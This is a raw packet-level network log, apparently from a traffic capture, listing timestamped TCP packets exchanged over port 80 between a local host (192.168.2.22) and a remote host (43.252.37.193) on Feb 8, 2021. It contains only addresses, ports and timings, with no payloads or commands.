Feb 8, 2021 06:39:02.194123030 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.194277048 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.194376945 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.194431067 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.194454908 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.194469929 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.194497108 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.194516897 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.194526911 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.194705009 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.194758892 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.194801092 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.194840908 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.194883108 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.194915056 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.194922924 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.194964886 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.195004940 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.195019007 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.195055962 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.195065975 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.195091963 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.195118904 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.195132971 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.195173979 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.195188999 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.195215940 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.195239067 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.195261002 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.195290089 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.195302010 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.195343018 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.195358992 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.195394993 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.195410967 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.195441961 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.195463896 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.195482969 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.195514917 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.195525885 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.195566893 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.195575953 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.195605993 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.195626020 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.195647955 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.195674896 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.195688963 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.195738077 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.195741892 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.195784092 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.195800066 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.195826054 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.195846081 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.195868015 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.195893049 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.195907116 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.195946932 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.195971966 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.195988894 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.196007967 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.196029902 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.196079016 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.196101904 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.197227955 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.401617050 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.401664019 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.401684999 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.401710033 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.401729107 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.401762009 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.401786089 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.401814938 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.401818991 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.401842117 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.401856899 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.401863098 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.401869059 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.401869059 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.401890039 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.401895046 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.401918888 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.401921988 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.401947021 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.401949883 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.401978016 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.401978970 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.402004004 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.402014971 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.402035952 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.402040958 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.402064085 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.402065039 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.402090073 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.402091026 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.402112007 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.402117014 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.402133942 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.402143002 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.402156115 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.402168036 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.402193069 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.402194023 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.402216911 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.402220011 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.402244091 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.402250051 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.402266979 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.402276993 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.402292013 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.402302027 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.402318001 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.402327061 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.402343988 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.402352095 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.402373075 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.402375937 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.402400970 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.402404070 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.402421951 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.402430058 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.402452946 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.402460098 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.402475119 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.402487040 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.402498960 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.402510881 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.402534962 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.402535915 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.402555943 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.402563095 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.402575970 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.402586937 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.402611971 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.402614117 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.402635098 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.402656078 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.606935024 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.606996059 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.607033014 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.607069969 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.607068062 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.607108116 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.607116938 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.607131004 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.607139111 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.607146025 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.607156038 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.607183933 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.607194901 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.607222080 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.607223034 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.607269049 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.607273102 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.607310057 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.607347012 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.607361078 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.607386112 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.607391119 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.607404947 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.607449055 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.607450008 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.607491016 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.607508898 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.607527018 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.607528925 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.607564926 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.607579947 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.607603073 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.607616901 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.607647896 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.607647896 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.607690096 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.607702971 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.607727051 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.607739925 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.607765913 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.607780933 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.607803106 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.607811928 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.607837915 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.607860088 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.607876062 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.607883930 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.607913017 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.607930899 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.607958078 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.607964993 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.607997894 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.608012915 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.608033895 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.608036041 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.608071089 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.608084917 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.608117104 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.812705040 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.812766075 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.812808037 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.812849045 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.812889099 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.812937021 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.812982082 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.813013077 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.813021898 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.813052893 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.813059092 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.813064098 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.813065052 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.813069105 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.813074112 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.813077927 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.813081980 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.813107014 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.813121080 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.813146114 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.813160896 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.813188076 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.813214064 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.813226938 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.813237906 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.813272953 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.813277006 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.813322067 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.813335896 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.813360929 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.813378096 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.813422918 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.813426971 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.813471079 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.813496113 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.813508987 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.813522100 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.813548088 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.813555956 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.813587904 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.813611031 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.813627005 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.813637018 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.813676119 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.813693047 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.813719988 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.813741922 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.813759089 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:02.813776970 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.813822985 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:02.820696115 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.018488884 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.018538952 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.018553019 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.018567085 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.018580914 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.018594980 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.018608093 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.018621922 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.018640041 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.018712044 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.018731117 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.018749952 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.018768072 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.018785000 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.018801928 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.018873930 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.018892050 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.018925905 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.019011021 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.019072056 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.019078970 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.019082069 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.019088984 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.019092083 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.019156933 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.019166946 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.019175053 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.019206047 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.019246101 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.019268036 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.019278049 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.019324064 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.019354105 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.019437075 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.019455910 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.019464016 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.223510027 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.223542929 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.223557949 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.223571062 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.223592043 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.223607063 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.223625898 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.223644972 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.223661900 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.223683119 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.223701000 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.223717928 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.223784924 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.223803043 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.223814011 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.223836899 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.223855972 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.223860979 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.223864079 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.223865986 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.223875999 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.223879099 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.223886967 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.223892927 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.223910093 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.223953009 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.223974943 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.223995924 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.224013090 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.224057913 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.224065065 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.224121094 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.224133015 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.224138021 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.224142075 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.224143982 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.224173069 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.224175930 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.428342104 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.428369999 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.428385973 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.428406000 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.428419113 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.428423882 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.428442001 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.428445101 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.428447962 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.428451061 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.428461075 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.428462982 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.428488970 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.428504944 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.428515911 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.428556919 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.428575039 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.428627014 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.428643942 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:03.428652048 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:03.428662062 CET	80	49165	43.252.37.193	192.168.2.22
